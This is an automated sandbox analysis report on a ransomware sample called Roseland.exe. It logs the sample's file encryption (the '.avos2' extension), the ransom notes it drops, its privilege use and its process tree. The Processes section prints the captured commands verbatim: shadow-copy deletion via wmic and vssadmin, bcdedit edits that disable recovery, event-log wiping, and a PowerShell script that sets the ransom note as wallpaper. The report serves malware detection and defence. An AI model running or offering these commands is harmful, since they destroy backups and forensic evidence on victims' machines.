Malware Analysis Report

2024-10-16 03:28

Sample ID 230130-r4m7nscd8s
Target Roseland.bin
SHA256 bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
Tags
evasion ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

Threat Level: Likely malicious

The file Roseland.bin was found to be: Likely malicious.

Malicious Activity Summary

evasion ransomware

Modifies boot configuration data using bcdedit

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-30 14:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-30 14:44

Reported

2023-01-30 14:47

Platform

win7-20221111-en

Max time kernel

51s

Max time network

33s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\NewInstall.crw => C:\Users\Admin\Pictures\NewInstall.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1612601169.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\HICCUP.WAV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\my\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB8.BDR C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN103.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\VisualElements\SmallLogo.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ClassicPhotoAlbum.potx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR18F.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_COL.HXC C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105320.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\DvdTransform.fx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME54.CSS C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sampler.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianMergeLetter.Dotx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore_2.10.1.v20140901-1043.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\es-ES\WMM2CLIP.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341559.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\settings.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1476 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1476 wrote to memory of 1456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 956 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 956 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 956 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2000 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2000 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2000 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 320 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 320 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 320 wrote to memory of 764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 564 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2844 wrote to memory of 2920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2844 wrote to memory of 2920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2844 wrote to memory of 2932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2844 wrote to memory of 2932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2844 wrote to memory of 2932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1612601169.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

memory/2000-54-0x0000000000000000-mapping.dmp

memory/956-55-0x0000000000000000-mapping.dmp

memory/320-56-0x0000000000000000-mapping.dmp

memory/1476-57-0x0000000000000000-mapping.dmp

memory/1456-59-0x0000000000000000-mapping.dmp

memory/472-60-0x0000000000000000-mapping.dmp

memory/564-58-0x0000000000000000-mapping.dmp

memory/764-62-0x0000000000000000-mapping.dmp

memory/268-61-0x0000000000000000-mapping.dmp

memory/2404-63-0x0000000000000000-mapping.dmp

memory/2404-64-0x000007FEFC201000-0x000007FEFC203000-memory.dmp

memory/2404-65-0x000007FEF4390000-0x000007FEF4DB3000-memory.dmp

memory/2404-67-0x0000000002244000-0x0000000002247000-memory.dmp

memory/2404-66-0x000007FEF3830000-0x000007FEF438D000-memory.dmp

memory/2404-68-0x000000000224B000-0x000000000226A000-memory.dmp

memory/2404-69-0x0000000002244000-0x0000000002247000-memory.dmp

memory/2404-70-0x000000000224B000-0x000000000226A000-memory.dmp

memory/2844-71-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 de81fdc2a98fa8b585f097a98b1b15e0
SHA1 aee4694b60d3359e282b08b1c237641a2241c7df
SHA256 c0ca00e1047dc6ce4175da2bd41fd697f3c8471eea08f5f255c85467b0f884dc
SHA512 10a6471994caf26b7fbb2bbfaecd29880b761b21d68e8a6ecfb89f9f05e0b63b938beb8f85c46196411a8c233b2e1de7682a71e010acba1a2e9010f55452a0f9

memory/2844-74-0x000007FEF4570000-0x000007FEF4F93000-memory.dmp

memory/2844-75-0x000007FEF3A10000-0x000007FEF456D000-memory.dmp

memory/2844-76-0x0000000002454000-0x0000000002457000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

